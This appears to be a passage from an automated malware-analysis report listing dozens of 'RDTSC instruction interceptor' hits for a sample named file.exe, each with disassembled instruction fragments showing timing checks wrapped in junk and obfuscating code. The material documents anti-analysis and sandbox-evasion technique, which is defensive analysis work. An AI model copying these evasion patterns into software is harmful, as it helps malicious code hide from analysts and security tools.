                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32A48 second address: C32A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32F74 second address: C32F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C32F7C second address: C32F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC41CC2F0C6h 0x0000000a pop esi 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C33222 second address: C33228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C28147 second address: C2815B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FC41CC2F0CDh 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C2815B second address: C28161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C28161 second address: C28165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C02B65 second address: C02B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C02B6D second address: C02B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC41CC2F0C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C02B7B second address: C02B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3337E second address: C33383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C33383 second address: C33389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C33389 second address: C3338F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3338F second address: C333A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC41CDAB66Eh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C333A9 second address: C333AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C33AC9 second address: C33AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC41CDAB666h 0x0000000a jmp 00007FC41CDAB66Eh 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C33AE1 second address: C33AEB instructions: 0x00000000 rdtsc 0x00000002 js 00007FC41CC2F0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C33C24 second address: C33C34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FC41CDAB668h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C38396 second address: C3839D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3839D second address: C383C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FC41CDAB666h 0x0000000f jmp 00007FC41CDAB677h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C0B3DF second address: C0B3E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3BB6F second address: C3BB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BB73 second address: C3BBA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FC41CC2F0D2h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007FC41CC2F0C8h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BBA9 second address: C3BBDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FC41CDAB678h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C3BD18 second address: C3BD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jmp 00007FC41CC2F0D6h 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C3F817 second address: C3F81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C408F2 second address: C408FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC41CC2F0C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C40982 second address: C40988 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C40988 second address: C409BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FC41CC2F0C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 jne 00007FC41CC2F0CCh 0x00000019 jnc 00007FC41CC2F0CCh 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C409BB second address: C409C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C409C0 second address: C409E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jns 00007FC41CC2F0D4h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C409E7 second address: C40A1F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FC41CDAB668h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 cld 0x00000026 push 9CDFC551h 0x0000002b push eax 0x0000002c push edx 0x0000002d jp 00007FC41CDAB668h 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C40B47 second address: C40B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC41CC2F0D9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C40DFE second address: C40E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C40FCA second address: C40FD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C41545 second address: C41578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b movsx esi, ax 0x0000000e nop 0x0000000f jmp 00007FC41CDAB66Ch 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC41CDAB675h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C41F99 second address: C4202B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41CC2F0CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC41CC2F0C8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+1245217Ah], edx 0x0000002d xor esi, dword ptr [ebp+122D31C4h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FC41CC2F0C8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 jns 00007FC41CC2F0CCh 0x00000057 xchg eax, ebx 0x00000058 je 00007FC41CC2F0E0h 0x0000005e pushad 0x0000005f jmp 00007FC41CC2F0D2h 0x00000064 jl 00007FC41CC2F0C6h 0x0000006a popad 0x0000006b push eax 0x0000006c push esi 0x0000006d push eax 0x0000006e push edx 0x0000006f push ebx 0x00000070 pop ebx 0x00000071 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C4202B second address: C4202F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C428B1 second address: C428B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C4276C second address: C42770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C428B5 second address: C428B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C428B9 second address: C428BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C428BF second address: C428C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: C428C6 second address: C42925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub edi, 7DDAE682h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FC41CDAB668h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a or si, 392Bh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FC41CDAB668h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D3192h], edi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push esi 0x00000056 pop esi 0x00000057 push edx 0x00000058 pop edx 0x00000059 popad 0x0000005a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C42925 second address: C4292F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC41CC2F0C6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: C43094 second address: C4309A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C443A6 second address: C44425 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FC41CC2F0D8h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], eax 0x00000010 mov esi, dword ptr [ebp+122D38CEh] 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007FC41CC2F0C8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 0000001Ah 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 push 00000000h 0x00000034 mov dword ptr [ebp+122D31AEh], ebx 0x0000003a xchg eax, ebx 0x0000003b js 00007FC41CC2F0DFh 0x00000041 jmp 00007FC41CC2F0D9h 0x00000046 push eax 0x00000047 push esi 0x00000048 jl 00007FC41CC2F0CCh 0x0000004e push eax 0x0000004f push edx 0x00000050 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4587C second address: C4591B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB674h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push esi 0x0000000b jmp 00007FC41CDAB674h 0x00000010 pop esi 0x00000011 nop 0x00000012 and esi, dword ptr [ebp+122D3816h] 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ecx 0x0000001d call 00007FC41CDAB668h 0x00000022 pop ecx 0x00000023 mov dword ptr [esp+04h], ecx 0x00000027 add dword ptr [esp+04h], 0000001Ah 0x0000002f inc ecx 0x00000030 push ecx 0x00000031 ret 0x00000032 pop ecx 0x00000033 ret 0x00000034 mov esi, dword ptr [ebp+1244885Ah] 0x0000003a push 00000000h 0x0000003c push 00000000h 0x0000003e push ebx 0x0000003f call 00007FC41CDAB668h 0x00000044 pop ebx 0x00000045 mov dword ptr [esp+04h], ebx 0x00000049 add dword ptr [esp+04h], 0000001Dh 0x00000051 inc ebx 0x00000052 push ebx 0x00000053 ret 0x00000054 pop ebx 0x00000055 ret 0x00000056 mov edi, 6197DE59h 0x0000005b push eax 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f jmp 00007FC41CDAB66Fh 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4591B second address: C45926 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C46330 second address: C46391 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB673h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a pushad 0x0000000b or cx, 2ECAh 0x00000010 mov dx, FD95h 0x00000014 popad 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push ebx 0x0000001a call 00007FC41CDAB668h 0x0000001f pop ebx 0x00000020 mov dword ptr [esp+04h], ebx 0x00000024 add dword ptr [esp+04h], 0000001Ch 0x0000002c inc ebx 0x0000002d push ebx 0x0000002e ret 0x0000002f pop ebx 0x00000030 ret 0x00000031 push 00000000h 0x00000033 xchg eax, ebx 0x00000034 jmp 00007FC41CDAB66Fh 0x00000039 push eax 0x0000003a push ecx 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e popad 0x0000003f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C46C45 second address: C46C5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jc 00007FC41CC2F0E3h 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007FC41CC2F0C6h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4E127 second address: C4E142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FC41CDAB674h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A4BD second address: C4A4C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4A4C2 second address: C4A4C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C50121 second address: C501B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jnc 00007FC41CC2F0C6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnl 00007FC41CC2F0CCh 0x00000014 pop edx 0x00000015 nop 0x00000016 mov ebx, dword ptr [ebp+1244885Ah] 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push eax 0x00000021 call 00007FC41CC2F0C8h 0x00000026 pop eax 0x00000027 mov dword ptr [esp+04h], eax 0x0000002b add dword ptr [esp+04h], 00000015h 0x00000033 inc eax 0x00000034 push eax 0x00000035 ret 0x00000036 pop eax 0x00000037 ret 0x00000038 movzx edi, bx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push edx 0x00000040 call 00007FC41CC2F0C8h 0x00000045 pop edx 0x00000046 mov dword ptr [esp+04h], edx 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc edx 0x00000053 push edx 0x00000054 ret 0x00000055 pop edx 0x00000056 ret 0x00000057 or bh, FFFFFF9Ch 0x0000005a xchg eax, esi 0x0000005b jmp 00007FC41CC2F0CEh 0x00000060 push eax 0x00000061 push eax 0x00000062 push edx 0x00000063 pushad 0x00000064 push edx 0x00000065 pop edx 0x00000066 jmp 00007FC41CC2F0D4h 0x0000006b popad 0x0000006c rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C501B5 second address: C501BA instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C53275 second address: C53294 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D3h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jng 00007FC41CC2F0C6h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C502BC second address: C502C6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jbe 00007FC41CDAB666h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C512BF second address: C512C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C502C6 second address: C502D7 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C512C5 second address: C512C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C502D7 second address: C502E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C53813 second address: C53818 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C502E0 second address: C5036A instructions: 0x00000000 rdtsc 0x00000002 jne 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c sbb edi, 54E52DB2h 0x00000012 push esi 0x00000013 mov ebx, edx 0x00000015 pop ebx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d push 00000000h 0x0000001f push ecx 0x00000020 call 00007FC41CDAB668h 0x00000025 pop ecx 0x00000026 mov dword ptr [esp+04h], ecx 0x0000002a add dword ptr [esp+04h], 00000014h 0x00000032 inc ecx 0x00000033 push ecx 0x00000034 ret 0x00000035 pop ecx 0x00000036 ret 0x00000037 mov bl, E5h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 movzx edi, dx 0x00000043 sub dword ptr [ebp+122D3390h], eax 0x00000049 mov eax, dword ptr [ebp+122D01CDh] 0x0000004f push 00000000h 0x00000051 push esi 0x00000052 call 00007FC41CDAB668h 0x00000057 pop esi 0x00000058 mov dword ptr [esp+04h], esi 0x0000005c add dword ptr [esp+04h], 00000014h 0x00000064 inc esi 0x00000065 push esi 0x00000066 ret 0x00000067 pop esi 0x00000068 ret 0x00000069 mov edi, 72C017A6h 0x0000006e mov edi, dword ptr [ebp+122D36BEh] 0x00000074 push FFFFFFFFh 0x00000076 or bx, 7605h 0x0000007b nop 0x0000007c push eax 0x0000007d push edx 0x0000007e jo 00007FC41CDAB66Ch 0x00000084 push eax 0x00000085 push edx 0x00000086 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C53818 second address: C5381D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5036A second address: C5036E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5381D second address: C53891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a mov edi, dword ptr [ebp+122D3089h] 0x00000010 push 00000000h 0x00000012 push 00000000h 0x00000014 push ebp 0x00000015 call 00007FC41CC2F0C8h 0x0000001a pop ebp 0x0000001b mov dword ptr [esp+04h], ebp 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ebp 0x00000028 push ebp 0x00000029 ret 0x0000002a pop ebp 0x0000002b ret 0x0000002c add ebx, dword ptr [ebp+122D19E3h] 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edi 0x00000037 call 00007FC41CC2F0C8h 0x0000003c pop edi 0x0000003d mov dword ptr [esp+04h], edi 0x00000041 add dword ptr [esp+04h], 00000015h 0x00000049 inc edi 0x0000004a push edi 0x0000004b ret 0x0000004c pop edi 0x0000004d ret 0x0000004e jbe 00007FC41CC2F0CCh 0x00000054 sub dword ptr [ebp+1246B4B3h], edi 0x0000005a push eax 0x0000005b pushad 0x0000005c jmp 00007FC41CC2F0CCh 0x00000061 pushad 0x00000062 push eax 0x00000063 push edx 0x00000064 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C547CC second address: C547D2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C547D2 second address: C547E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push edi 0x00000009 pushad 0x0000000a popad 0x0000000b pop edi 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C56867 second address: C5686B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C5686B second address: C56884 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FC41CC2F0CFh 0x0000000f rdtsc
